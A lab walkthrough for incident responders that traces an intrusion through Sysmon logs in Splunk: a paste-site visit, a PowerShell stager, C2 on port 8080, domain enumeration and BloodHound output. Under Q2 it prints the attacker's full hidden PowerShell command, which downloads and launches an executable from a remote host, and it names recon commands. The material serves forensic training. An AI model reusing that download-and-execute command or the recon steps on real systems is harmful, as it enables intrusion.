#Lab205 - Walkthrough
Q1) The intrusion started when the victim accessed a suspicious URL from a file-sharing service. What was the name of the website that triggered the compromise?
To begin unraveling this attack, our first objective is to determine how the attacker initially gained access to the victim machine. In many compromises, the first foothold comes from a user interacting with a malicious link, which can silently lead to the download or execution of attacker-controlled content. By identifying the exact domain visited, we gain a clear picture of where the infection chain began and how the attacker delivered their stager.
In this case, our victim is the workstation DESKTOP, which executed suspicious activity on August 25, 2025. To confirm the initial access vector, we focus on DNS activity logs, because whenever a user visits a website, the host must first resolve the domain name to an IP address. Fortunately, Sysmon provides this visibility through Event ID 22 (DNS Query), which records every DNS lookup a process makes.
We begin by searching Splunk for all DNS queries made by the victim machine. Since benign background traffic often clutters the results, we can exclude some services (such as corporate domains or trusted remote tools). The following query helps us isolate potential anomalies:
index="main" EventCode=22 QueryName!=*splashtop* QueryName!=*coretech.lab*
| stats count by QueryName
| table QueryName, count
| sort count
Reviewing the output, we immediately notice a suspicious entry: paste.sh
This domain appears only once during the timeframe of interest, making it stand out as an anomaly. Domains like paste.sh are particularly interesting because paste services are frequently abused by attackers to host payloads, malicious scripts, or encoded command snippets. In this attack, the single lookup of paste.sh aligns with the victim browsing activity that initiated the compromise.
To confirm when and how this query occurred, let's refine our search:
index="main" EventCode=22 QueryName="paste.sh"
| table _time, host, QueryName, Image, User
The forensic confirms that on 2025-08-25 at 13:27:40, the victim host DESKTOP executed msedge.exe under the logged-in user, initiating a DNS lookup to paste.sh, thereby confirming that the browser accessed the malicious domain at the time the intrusion began.
Answer: paste.sh
Q2) After visiting this website, the victim executed a PowerShell command via Run. What is the full url to the file that was downloaded after executing this command?
Once we have established that the victim machine accessed the suspicious domain paste.sh, our next step is to determine what happened immediately afterward. In many attack scenarios, a malicious site does not cause direct damage on its own; instead, it often provides the user with a command or payload to execute.
In this case, the investigation indicates that the victim used the Windows Run dialog to execute a PowerShell command. Such commands are critical to identify because they often represent the very first stage of malicious code delivery, typically downloading and executing a file that continues the attack chain.
To monitor malicious PowerShell execution, we correlate Sysmon Event ID 1 (detailed process creation with full command-line arguments), Windows Security Event ID 4688 (process creation with optional command-line data if auditing is enabled), and PowerShell Event ID 4104 (script block logging of executed code when enabled), and in Splunk we pivot on these telemetry sources to identify suspicious PowerShell activity proximate to the victim’s access of paste.sh at 2025-08-25 13:27:40.
index="main" host=DESKTOP (EventCode=1 OR EventCode=4688)
(Image="*\\powershell.exe" OR CommandLine="*powershell*")
| table _time, User, Image, CommandLine, ParentImage
| sort _time
At approximately 13:30, log analysis revealed a suspicious PowerShell execution by the logged-in user, characterized by the use of the -WindowStyle Hidden flag to conceal activity, an outbound connection to 10.10.5.171:8883, and the retrieval of a remote executable subsequently written to the victim’s TEMP directory.
The exact command observed is:
powershell.exe -WindowStyle Hidden -c "iwr http://10.10.5.171:8883/iexploreplugin.exe -OutFile $env:TEMP\iexploreplugin.exe; Start-Process $env:TEMP\iexploreplugin.exe"The PowerShell command leveraged iwr (Invoke-WebRequest) to retrieve iexploreplugin.exe from the attacker-controlled host http://10.10.5.171:8883/, stored it in the user’s %TEMP% directory, and executed it via Start-Process, thereby confirming that the payload delivered to the victim system following the paste.sh visit was iexploreplugin.exe.
Answer: http://10.10.5.171:8883/iexploreplugin.exe
Q3) Once executed, the payload established a remote connection. What is the attacker’s IP address and port used for the first C2 communication?
Now that we’ve confirmed the delivery of the payload iexploreplugin.exe via PowerShell, our next goal is to determine how this malware communicated back to its command-and-control (C2) infrastructure. In most modern attacks, payloads don’t just sit idle on disk; they actively beacon out to the attacker’s infrastructure to receive further instructions.
Since we know that iexploreplugin.exe was downloaded and executed at 13:30:32 by the user coretech\t.leon on the host DESKTOP, our investigation will now focus on identifying any new network connections initiated by this process.
Outbound communication can be traced across multiple telemetry sources, but Sysmon Event ID 3, which records the initiating process along with source/destination IP, port, and protocol, provides the most conclusive evidence for attributing network traffic, such as the connection from iexploreplugin.exe whereas Security Event ID 5156 offers limited connection data and DNS Event ID 22 assists primarily in domain resolution analysis.
Because we already know the time (13:30:32) and the process (iexploreplugin.exe in the user’s TEMP directory), we can zoom in on all network connections from this process within that time window:
index="main" host=DESKTOP EventCode=3 Image="*iexploreplugin.exe"
| table _time, User, Image, DestinationIp, DestinationPort, Protocol, SourceIp, SourcePort
| sort _time
When we review the logs just after 13:30:32, we observe that iexploreplugin.exe on host DESKTOP initiated a TCP connection to destination IP 10.10.5.62 over port 8080. This confirms that the payload successfully established its first command-and-control (C2) channel with attacker-controlled infrastructure.
Defenders should always monitor for unusual outbound connections, especially to non-standard ports like 8080, which attackers often abuse for C2 traffic disguised as normal web activity. Tying these connections to suspicious processes (like iexploreplugin.exe) is what allows us to confirm they are malicious.
Answer: 10.10.5.62:8080
Q4) During discovery, the attacker attempted to enumerate domain accounts. Which command did they use to list all domain users?
After establishing the first C2 channel through iexploreplugin.exe, the attacker quickly began a discovery phase. At this stage, adversaries typically want to learn more about the environment they’ve landed in: who the users are, what machines exist, and where valuable targets like domain controllers reside.
One of the first actions adversaries often perform is to enumerate accounts. Knowing which accounts exist and especially which have administrative privileges, helps the attacker plan their privilege escalation and lateral movement.
To investigate attacker enumeration, we can rely on two primary forensic artifacts: Sysmon Event ID 1, which provides full command-line visibility for executed processes, and Windows Security Event ID 4688, which also records process creation but may truncate arguments without enhanced auditing. Since the enumeration was carried out interactively through the attacker’s C2 session, we expect these commands (e.g., net, whoami) to appear as child processes of iexploreplugin.exe or whichever process the malware migrated into, so we’ll focus on process creation logs to determine exactly which commands were executed.
index="main" host=DESKTOP (EventCode=1 OR EventCode=4688) (CommandLine="*net *" OR CommandLine="*whoami*" OR CommandLine="*nltest*")
| table _time, User, ParentImage, Image, CommandLine
| sort - _time
As we review the output, we notice several discovery commands such as net localgroup administrators, whoami, and hostname. The command that stands out, however, is net user /domain, which queries Active Directory to enumerate all domain accounts. This is particularly significant because it leverages a built-in Windows utility, requiring no external tools, making it a common technique attackers use for reconnaissance.
Answer: net user /domain
Q5) The attacker, during reconnaissance, ran an enumeration tool via C2 after migrating to another process. The tool then generated an output file on the victim host. Which process did they migrate into, and what file was created?
At this stage of the investigation, we know the attacker had already established persistence on the victim machine and begun executing enumeration commands (net user, whoami /all, etc.). Our next task is to determine what more advanced activity they performed during the same timeframe.
Because enumeration tools typically generate new files (logs, dumps, or archives), we can look for evidence of file creation. Sysmon Event ID 11 (FileCreate) is an excellent place to start, since it records whenever a new file appears on disk.
From earlier analysis, we know the suspicious activity occurred shortly after 13:30:32, when iexploreplugin.exe was executed and the attacker began running discovery commands.
To avoid too much noise, let’s narrow our Splunk search to a 10-minute window (13:30 to 13:40).
index="main" host=DESKTOP EventCode=11
| table _time, Image, TargetFilename, User
| sort 0 _time
Among the routine files, a group of suspicious filenames immediately stands out. This is highly unusual for normal workstation activity. JSON files with names referencing users, computers, groups, GPOs, and domains strongly suggest bulk Active Directory enumeration. Even more suspicious is the ZIP file with a timestamp in its name, which likely contains the collected data.
Now that we know these files exist, the next step is to figure out which process created them. For that, we extend our query to include the Image field:
index="main" host=DESKTOP EventCode=11 (TargetFilename=*.zip OR TargetFilename=*.json)
| table _time, Image, TargetFilename, User
When we review the output, we find something highly unusual: all of these files were created by notepad.exe. This is a clear anomaly, as Notepad is a simple text editor and does not normally generate JSON or ZIP archives. The fact that notepad.exe is responsible for these file creations is a strong indicator that the attacker migrated into the Notepad process and executed their enumeration tool from within it.
Answer: notepad.exe,20250825133552_BloodHound.zip
Last updated